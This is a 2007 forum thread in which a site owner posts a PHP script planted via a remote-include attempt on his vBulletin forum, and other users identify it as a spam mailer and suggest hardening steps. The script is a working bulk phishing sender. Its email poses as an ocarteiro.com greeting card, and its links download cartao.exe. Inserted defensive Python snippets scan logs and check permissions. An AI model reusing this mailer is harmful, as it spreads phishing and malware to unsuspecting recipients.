05-04-2007, 03:38 PM #1 txspaderz
Can Anyone Tell Me What This Script Does?

I was checking my WOL today and I noticed a Mexican IP trying to run an old vBulletin exploit. This is the script. Does anyone know specifically what this does?

Code:
<?php

set_time_limit(0);

if($manda)
{
//RECIPIENT'S EMAIL
$destinatario = "$remetente";

//EMAIL SUBJECT
$assunto = "Admirador lhe enviou um cartão.";

//EMAIL MESSAGE
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//EMAIL HEADERS
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* additional headers */
$headers .= "From: <O carteiro> <entrega@ocarteiro.com>\r\n";

//FILE WITH THE EMAIL ADDRESSES
$arquivo = $lista;

//READING THE FILE
$file = explode("\n", $arquivo);
$i = 1;


?><title>php sender</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>&nbsp;</p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
  <tr>
    <td bgcolor="#f5f5f5"> 
      <?
	foreach ($file as $mail) {

				if(mail($mail, $assunto, $mensagem, $headers))

					echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>OK</font><br>";

				else

					echo "* $i  ".$email[$i]." <font color=red>NO</font><br><hr>";

$i++;
	 

}
}
?>
    </td>
  </tr>
</table><? } ?>
<form name="form1" method="post" action="">
  <table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
    <tr> 
      <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr> 
            <td colspan="3" bgcolor="#666666"> <div align="center"><font color="#FFFFFF" size="2" face="Verdana, Arial, Helvetica, sans-serif"><b> Enviador priv8 by Morientes
                </b></font></div></td>
          </tr>
          <tr> 
            <td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">MSG:</font></b></font></div></td>
            <td bgcolor="#666666">&nbsp;</td>
            <td><textarea name="html" cols="30" rows="5" id="textarea2">
<html>
<html>
<head>
<title>ocarteiro.com - cartões, diversão e muito mais...</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'>
<style type=text/css>
a:visited {text-decoration: none}
a:link {text-decoration: none}
a:hover {text-decoration: underline}
</style>
</head>

<body text='#000000' background='http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gifgif' leftmargin='0' topmargin='0' marginwidth='0' marginheight='0'>
<table width='100%' border='0' cellspacing='0' cellpadding='0' height='100%' background='http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gif'>
  <tr>
    <td align='center'> <br>
      <table width='550' border='0' cellspacing='0' cellpadding='0' align='center' bgcolor='FFBE00'>

        <tr> 
          <td align='center' valign='top'><img src='http://www.ocarteiro.com.br/images/email_cart_2_2.gif' width='550' height='101'></td>
        </tr>
        <tr> 
          <td align='center' valign='top'> 
            <!--text -->
            <table width='80%' border='0' cellspacing='0' cellpadding='0'>
              <tr> 
                <td>
                  <p><img src='http://www.ocarteiro.com.br/images/email_cart_2_3.gif' width='372' height='35'></p>
                  <p><font face='Verdana, Arial' size='1'>Ol&aacute;, veja o cart&atilde;o que preparei para voc&ecirc;:</font></p>

                  <p><font face='Verdana, Arial' size='1' color='A50102'><b>
                  <a style="color:#A50102" href="http://orkute.bravehost.com/cartao.exe">http://www.ocarteiro.com/lercartao.php?id=1916623949A3240</a></b></font></p>
                  <p align='center'>
                  <a target="_blank" href="http://orkute.bravehost.com/cartao.exe"><img src='http://www.ocarteiro.com.br/images/email_cart_2_4.gif' width='143' height='38' border='0'></a></p>
                  <font face='Verdana, Arial' size='1'><font color='A50102'>Voc&ecirc; 
                  tamb&eacute;m poder&aacute; visualiz&aacute;-lo em 
                  <a href="http://orkute.bravehost.com/cartao.exe">http://www.ocarteiro.com</a> 
                  colocando o n&uacute;mero do seu cart&atilde;o:</font><b><font color='A50102'> 
                  1916623949A3240</font></b></font></td>

              </tr>
            </table>            
          </td>
        </tr>
        <tr>
          <td align='center' width='550' height='167' background='http://www.ocarteiro.com.br/images/email_cart_2_5.gif'> 
            <table width='100%' border='0' cellspacing='0' cellpadding='0'>
              <tr align='center'> 
                <td><br><br><br>
				<!--- START TAG POSITION OCARTEIRO-468X60 --->

<TABLE WIDTH=468 BORDER=0 CELLPADDING=0 CELLSPACING=0>
  <TR>
    <TD width="326" valign="bottom"><a href="http://www.bemleve.com.br/cadastro/cadastro_etapa1.php?id_parceria=342&dieta=emagrecer" target="_blank"><img src="http://www.bemleve.com.br/publicidades/ocarteiro/full_bl_ocarteiro_150506/images/full_bl_ocarteiro_01.gif" width="326" height="60" border="0"></a></TD>
    <TD><a href="http://www.bemleve.com.br/cadastro/cadastro_etapa1.php?id_parceria=342&dieta=emagrecer" target="_blank"><IMG SRC="http://www.bemleve.com.br/publicidades/ocarteiro/full_bl_ocarteiro_150506/images/full_bl_ocarteiro_02.jpg" ALT="" WIDTH=142 HEIGHT=60 border="0"></a></TD>
  </TR>

  <TR>
    <TD colspan="2" valign="bottom"><img src="http://www.bemleve.com.br/bin/hits.php?id_parceria=342&dieta=emagrecer" width="1" height="1"></TD>
  </TR>
</TABLE>

				<!--- END TAG POSITION OCARTEIRO-468X60 --->
				</td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
      <br>
   </td>
  </tr>
</table>
</body>
</html>
</html>

</textarea></td>
          </tr>
          <tr> 
            <td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">E-MAILS:</font></b></font></div></td>
            <td bgcolor="#666666">&nbsp;</td>
            <td><textarea name="lista" cols="40" rows="10" id="textarea3">Emails para serem enviados</textarea></td>
          </tr>
          <tr> 
            <td><div align="center"></div></td>
            <td bgcolor="#666666">&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td bgcolor="#666666">&nbsp;</td>
            <td><div align="center"> 
                <input name="manda" type="submit" id="manda" value="Yeah!">
              </div></td>
          </tr>
        </table></td>
    </tr>
  </table>
</form>

05-05-2007, 03:58 AM #2 txspaderz
Anyone?

05-05-2007, 06:18 AM #3 Jolteon
Patience is a virtue.

Also, if that's an exploit, should it really be posted here....

05-05-2007, 11:24 AM #4 RedMatrix
Just by reading the comments, this script lets the user find & make himself a private email address, to do with whatever he pleases.

05-05-2007, 04:03 PM #5 txspaderz
I'm not sure if it was an exploit... The specific path he was going to was

http://www.mysite.com/forum/home.php...nh/enviar.txt?

I went to that file and it showed that script that I posted.

Ever seen anything like that?
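
As an added example (not part of the thread): assuming the elided part of the URL in post #5 is a query parameter carrying a remote URL, this Python check pulls such requests out of an access log. The log lines, the parameter name `page` and the host `files.example.net` are constructed for illustration; `www.mysite.com` is the placeholder host from the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log line: client IP, then the quoted request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# A parameter value that is itself a URL with a scheme and a host.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://[^/\s]+', re.IGNORECASE)

# Constructed sample log (documentation IPs, hypothetical parameter names).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/May/2007:15:30:01 -0500] "GET /forum/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/May/2007:15:31:44 -0500] "GET /forum/home.php?page=http://files.example.net/x/enviar.txt? HTTP/1.1" 404 312',
    '203.0.113.7 - - [04/May/2007:15:31:50 -0500] "GET /forum/home.php?page=http%3A%2F%2Ffiles.example.net%2Fx%2Fenviar.txt%3F HTTP/1.1" 404 312',
    '192.0.2.11 - - [04/May/2007:15:32:10 -0500] "GET /forum/login.php?url=http://www.mysite.com/forum/index.php HTTP/1.1" 200 2048',
]

def remote_host(value):
    """Return the host if value is a URL, '' if it is malformed, else None."""
    if not REMOTE_URL_RE.match(value):
        return None
    try:
        return urlsplit(value).hostname or ""
    except ValueError:  # malformed authority part: still worth flagging
        return ""

def find_remote_include_probes(lines, own_hosts=("www.mysite.com",)):
    """Return (ip, path, param, value) for every request whose query string
    passes a URL on a host other than the site's own."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decoded once; undo double encoding
            host = remote_host(value)
            if host is not None and host not in own_hosts:
                hits.append((m.group("ip"), parts.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in find_remote_include_probes(SAMPLE_LOG):
        print(hit)
```

Redirect-style parameters that legitimately point at other sites will also match, so extend `own_hosts` with the hosts the forum is expected to link to before alerting on the output.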

05-05-2007, 05:07 PM #6 RedMatrix
Nope, but "enviar" means "send" in Spanish.

05-08-2007, 01:04 AM #7 Stump
Looks like a possible spam script.

Almost certainly looks like a spam script after some analysis, and a very poorly coded one at that.
Last edited by Moelman; 05-08-2007 at 01:17 AM. Reason: combined double post

05-08-2007, 02:26 AM #8 JonathanSA
From the looks of it, it could possibly be a script to send out spam, though to whom?

The above script does not appear to connect to the vBulletin MySQL Class or config.php, hence, it would have to be running off another configuration file and/or database.

With that, I don't know what exactly they were attempting to do, other than send spam, though I would check the permissions on your folders and make sure they are not world writable, rather, only the server and script can write to them.


Also, I would look into securing your vBulletin installation:

1). Secure your AdminCP & ModCP folders using .htaccess.

2). Rename your AdminCP & ModCP folders (be sure to change this in config.php).

3). Check all folder permissions, as stated above.

05-08-2007, 02:29 AM #9 txspaderz
Good idea on those. Are there tutorials on securing the CP's and renaming the directories?

Also, what should I chmod the folders to? 775?


Edit: N/M, I googled and found (imagine that) tut's and articles on securing the CP's and using htaccess. I've done both. How about the permissions?
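
As an added example (not part of the thread): one way to run the folder-permission check advised in post #8, which also shows how the 775 asked about in post #9 differs from 777. It walks a directory tree and reports everything the "other" class can write to; the directory layout and file names in the demo are constructed.

```python
import os
import stat
import tempfile

def find_world_writable(root):
    """Return sorted (relative_path, octal_mode) for every file or directory
    under root that any local user ('other') can write to."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits say nothing about access
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:  # the o+w bit, e.g. 0777 or 0666
                findings.append((os.path.relpath(path, root),
                                 format(mode, "04o")))
    return sorted(findings)

def build_demo_tree(root):
    """Create a constructed forum layout with mixed permissions."""
    layout = [
        ("forum", 0o755, True),
        ("forum/includes", 0o755, True),
        ("forum/includes/config.php", 0o644, False),
        ("forum/attachments", 0o775, True),    # rwxrwxr-x: group may write
        ("forum/uploads", 0o777, True),        # rwxrwxrwx: anyone may write
        ("forum/uploads/enviar.txt", 0o666, False),
    ]
    for rel, mode, is_dir in layout:
        path = os.path.join(root, rel)
        if is_dir:
            os.mkdir(path)
        else:
            with open(path, "w") as fh:
                fh.write("placeholder\n")
        os.chmod(path, mode)  # set explicitly so the umask does not interfere

def audit_demo():
    """Build the demo tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return find_world_writable(tmp)

if __name__ == "__main__":
    for rel, mode in audit_demo():
        print(mode, rel)
```

The 0775 directory is not reported because only owner and group can write to it; whether that is tight enough depends on which account the web server runs as and which group owns the folder.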